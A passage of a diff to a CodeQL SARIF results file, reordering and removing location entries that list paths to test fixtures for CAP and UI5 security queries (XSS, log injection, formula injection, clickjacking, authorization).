"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 410 } @@ -13760,9 +13760,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/heuristic-models/tests/Sources/test.js", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 4 } } } ], @@ -13786,9 +13786,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", - "index" : 4 + "index" : 411 } } } ], @@ -13812,7 +13812,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/heuristic-models/tests/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 412 } @@ -13838,7 +13838,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 413 } @@ -13864,7 +13864,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "qlt.conf.json", + "uri" : "scripts/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 414 } @@ -13890,7 +13890,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "scripts/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 415 } @@ -13916,7 +13916,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 416 } @@ -13985,13 +13985,13 @@ } }, { "location" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 7 } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : ".github/codeql/codeql-config.yaml", "uriBaseId" : "%SRCROOT%", "index" : 8 } @@ -14009,13 +14009,13 @@ } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", "uriBaseId" : "%SRCROOT%", "index" : 11 } }, { "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 12 } @@ -14063,19 +14063,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 20 } }, { "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 21 } }, { "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 22 } @@ -14117,13 +14117,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 29 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 30 } @@ -14153,13 +14153,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 35 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 36 } @@ -14177,13 +14177,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 39 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", "index" : 40 } @@ -14201,13 +14201,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 43 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 44 } @@ -14219,43 +14219,43 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 46 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", "index" : 47 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 48 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", "uriBaseId" : "%SRCROOT%", "index" : 49 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 50 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 51 } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", "uriBaseId" : "%SRCROOT%", "index" : 52 } @@ -14291,26199 +14291,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 59 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 81 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 119 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 152 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - } - }, { - "location" : { - "uri" : 